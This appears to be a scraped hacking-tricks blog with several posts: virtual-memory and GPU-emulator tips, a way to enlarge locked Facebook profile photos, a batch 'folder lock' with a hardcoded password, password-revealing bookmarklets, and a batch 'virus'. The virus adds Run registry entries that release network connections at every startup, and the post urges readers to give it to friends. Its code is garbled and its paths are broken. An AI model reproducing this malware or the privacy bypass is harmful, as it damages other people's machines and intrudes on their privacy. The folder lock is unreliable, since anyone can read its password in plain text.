Use Hard Disk As Ram

Step 1: Go to Start-> Computer(right click)-> Properties
Step 2: Now on the left pane, under Control Panel Home, click on Advanced system settings
Step 3: Navigate to Advanced tab, under Performance tab, click on Settings...
Step 4: When Performance Options window, click on Advanced tab.
Step 5: Under Virtual memory, you get to change the paging file size for all drives. Click on Change... button (step 3-5 are shown below)
Step 6: Here you can uncheck Automatically manage paging file size for all drives and set values as per your requirements
Click OK. It will ask you for a restart. Restart your system and we are done!
HOW TO PLAY HEAVY GAMES OR BIG GAMES WITHOUT GRAPHIC CARD..........
HOW TO PLAY HEAVY GAMES OR BIG GAMES WITHOUT GRAPHIC CARD
THIS IS A TUTORIAL ON HOW YOU CAN RUN GAMES WHICH REQUIRE HIGH END GRAPHICS CARD ON A LOW END PC. RUN HEAVY GAMES LIKE CRYSIS ON A COMPUTER WITH A LOW END GRAPHICS CARD / INBUILT VIDEO CARD..
The following is the Video from Youtube - running Crysis with Swiftshader. The Specification of the Computer running it is: 384 MB RAM, 1.2 Ghz Intel P3 Processor with S3 Graphics Twister (Integrated mobile variant of S3 Savage4 core) 32MB.
Download 3D Analyzer 2.36 3dfxzone
GRAPHICS CARD EMULATOR
Yes, now you can, run heavy Games like Crysis which require a high performance Graphics Card even on a low end Computer without buying yourself a new Graphics Card.You can use one of the following softwares to accomplish it:
Swiftshader
TransGaming’s SwiftShader Software GPU Toolkit is the world’s fastest and most flexible general-purpose pure software 3D rendering technology.
SwiftShader’s modular architecture is capable of supporting multiple application programming interfaces, such as DirectX® 9.0, and OpenGL® ES 2.0, the same APIs that developers are already using for existing games and applications. This makes it possible to directly integrate SwiftShader into applications without any changes to source code. SwiftShader technology can also support custom front-end APIs that have been explicitly built for a specific application.
Rendering features available range from basic fixed function rendering through to Shader Model 3.0 level capabilities such as advanced shaders, floating point rendering, multi-sample anti-aliasing, and much more.
SwiftShader performs as much as 100 times faster than traditional software renderers such as Microsoft's Direct3D® Reference Rasterizer. In benchmark tests on a modern CPU, SwiftShader-based renderers can achieve performance that surpasses integrated graphics hardware – a modern quad-core Core i7 CPU at 3.2 GHz running SwiftShader scores 620 in 3DMark06. SwiftShader achieves this unprecedented level of performance by dynamically compiling highly optimized code specific to an application's 3D rendering needs, and executing that code across all available CPU cores in parallel.
Source: TransGamingThe following is the Video from Youtube - running Crysis with Swiftshader. The Specification of the Computer running it is: 384 MB RAM, 1.2 Ghz Intel P3 Processor with S3 Graphics Twister (Integrated mobile variant of S3 Savage4 core) 32MB.
You can also order a personal version (available for free) from TransGaming
Download SwiftShader 3.0 4Shared
The Personal Version displays a watermark on the game screen. All you have to do to use Swiftshader is copy the Swiftshader's d3d9.dll file to the Game's root folder (the folder which has the Game Executable File). SwiftShader won't work with Games that load the d3d9.dll from System Folder only. Swiftshader can be configured with an ini file. The Commercial Version of Swiftshader has extra features.
Installation
The SwiftShader DX9 Shader Model 3.0 Demo is packaged as a single DLL file: d3d9.DLL Both 32-bit and 64-bit versions of this DLL are included. These DLL files can be dropped into a directory containing an application that uses Direct3D 9, and SwiftShader will automatically be used in place of the built-in OS version of Direct3D. Note that some applications may load the D3D DLL directly from the Windows System32 directory. Such programs will not work directly with the SwiftShader DX9 Shader Model 3.0 Demo. In addition to the DLL file, an optional configuration file can be used with SwiftShader. This file, SwiftShader.ini, can be put in the same directory as the application, and can be used to fine tune performance and quality settings. The commercial version of SwiftShader includes an API for changing many of these settings programmatically at runtime. Running Bully with SwiftShader3D Analyzer
3D Analyzer is a software from Tommti Systems that emulates various 3D Graphics Functions one of which is Shader 2.0. It is also capable of Transform and Lighting (TnL) Hardware Emulation.HOW TO PLAY HEAVY GAMS OR BIG GAMES WITHOUT GRAPHIC CARD
![]() |
| 3D Analyzer 2.36b |
How To View Facebook Private Profile Photo In Large Size ?
How To View Facebook Private Profile Photo In Large Size?

Sometime you want to see clear image of someone on facebook who might not be your friend but his/her privacy setting stop you from doing this. In this tutorial i will teach you to view facebook private or locked profile picture in large size with very simple trick.
2. Right click on the profile picture and click on Copy Image Url as shown in image below.
3. Open that image in new tab by right clicking and selecting Paste (CTRL + V)
4. Now change the value of image size highlighted below which might be s160x160 tos720x720 (If its not clear try (s320x320)
5. The image will enlarge in size. This trick does not always work.

Sometime you want to see clear image of someone on facebook who might not be your friend but his/her privacy setting stop you from doing this. In this tutorial i will teach you to view facebook private or locked profile picture in large size with very simple trick.
How To View Facebook Locked Profile Picture ?
1. Open the facebook profile of person whose profile picture is locked or is set to private.2. Right click on the profile picture and click on Copy Image Url as shown in image below.
3. Open that image in new tab by right clicking and selecting Paste (CTRL + V)
4. Now change the value of image size highlighted below which might be s160x160 tos720x720 (If its not clear try (s320x320)
5. The image will enlarge in size. This trick does not always work.
PASSWORD PROTECT ANY FOLDER,FILE WITHOUT SOFTWARE...
PASSWORD PROTECT ANY FOLDER,FILE WITHOUT SOFTWARE............


In my previous post i have teach you to hide files behind images. In this tutorial i will show you interesting and usefull trick to password protect folder without using any software using batch file programming. This trick will work on all windows platform (Win XP, Win 7). Follow below tutorial to learn this trick.
How To Lock Folder ?
1. Open Notepad and Copy code given below into it.
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End
2. Save the notepad file as lock.bat (.bat is must)
3. Now double click on lock.bat and a new folder will be created with name MyFolder
4. Copy all your data you want to protect in that New folder
5. Now double click on lock.bat and when command promp appears Type Y and press enter.
6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
7. It will ask for password enter your password and done. (Default password is coolhacks)
- To change the password replace coolhacks with new password in the above code
How To Further Secure ?
You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pendrive and copying it into your computer whenever you required to access to your protected files.
HOW TO REVEAL OR RECOVER PASSWORD BEHIND ASTERISKS OR DOTS

Google Chrome:
Starting off with Google chrome, the easiest way to reveal the original passwords behind the asterisk is using inbuilt Inspect element feature in the browser.- You just need to right click on the password field in the browser where you will get an option "Inspect Element".
- After clicking on it, "Web Inspector" will open out and there you can see some code which is basically Html code and you just need to replace the "password" word with "text" word and it will reveal the words behind the asterisks.
There’s another way using JavaScript which is quite quick and easy as compared to above method. Just open a site that allows users to login and after typing the password, just enter the following JavaScript code in the address bar.
Javascript: alert(document.getElementById('Passwd').value);After entering the above code in the address bar, press enter and it will pop up a window with your password written on it.
Mozilla Firefox:
The Next most common browser is "Mozilla Firefox".- The chrome's "Web Inspector" trick is also applicable in Firefox.
- Open a site that asks for login (like Facebook), right click on the password field in the browser where you will get an option "Inspect Element". After clicking on it, "Web Inspector" will open out and there you can see some code which is basically Html code and you just need to replace the "password" word with "text" word and it will reveal the words behind the asterisks as shown in screenshot below.
javascript:(function(){var s,F,j,f,i;s="";F=document.forms;for(j=0;j<F.length;++j){f=F[j];for(i=0;i<f.length;++i){if(f[i].type.toLowerCase()=="password")s+=f[i].value+"\n";}}if(s)alert("Password is:\n\n"+s);else alert("No passwords");})();After saving this as a bookmark, open a site that allows users to login and after typing the password, open the saved bookmark by clicking on it and it will pop up a window with your password written on it.
Opera:
Next comes the "Opera" in that you can use "Dragonfly", which is an in built tool, to reveal the words behind the asterisks just like chrome's "Web Inspector". Open a site that asks for login (likeFacebook), right click on the password field in the browser and select "Inspect Element" option. After clicking on it, "Dragon Fly" will open out and you’ll see some code which is basically Html code and you just need to replace the "password" word with "text" word and it will reveal the words behind the asterisks as shown in screen shot below.
Internet Explorer:
In the same manner you can apply this trick on Internet explorer. First of all open any site (Gmail in our case) that allows user login. Now for bringing out “developer tools” press the f12 key. A new window will be opened and press Ctrl+B to enable selection of elements. After that go to login page and select the password field, doing this will take you to the password field’s code in developer window (highlighted by yellow). Now, you just need to replace the "password" word with "text" word and it will remove the asterisk mask in the password field, see screenshot below.Apart from this, there’s another way which is quite quick and easy as compared to above method. Just open a site that allows users to login and after typing the password, just enter the following JavaScript code in the address bar.
alert(document.getElementById('Passwd').value);After entering the above code in the address bar, press enter and it will pop up a window with your password written on it. (See pic below)
Trick to make Virus which can Disable Internet Permanently
Trick to make Virus which can Disable Internet Permanently
There is a Trick to make Virus which can Disable Internet Permanently. To do this follow these simple steps :
1) Open Notepad.
2) Copy and Paste the following Code into Notepad :
echo @
echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/ release_all>>c:windowswimn32.ba t
echo end>>c:windowswimn32.bat
reg add
hkey_local_machinesoftwaremicr osoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d
:windowswimn32.bat /f reg add
hkey_current_usersoftwaremicro softwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE
3) Save it as Internet Disabled.bat.
4) Now it is done. So it is a simple Trick to make Virus which can Disable Internet Permanently.
And Give this file to your friend... But try At own your Risk .....
There is a Trick to make Virus which can Disable Internet Permanently. To do this follow these simple steps :
1) Open Notepad.
2) Copy and Paste the following Code into Notepad :
echo @
echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/
echo end>>c:windowswimn32.bat
reg add
hkey_local_machinesoftwaremicr
:windowswimn32.bat /f reg add
hkey_current_usersoftwaremicro
echo You Have Been HACKED!
PAUSE
3) Save it as Internet Disabled.bat.
4) Now it is done. So it is a simple Trick to make Virus which can Disable Internet Permanently.
And Give this file to your friend... But try At own your Risk .....
Subscribe to:
Comments (Atom)











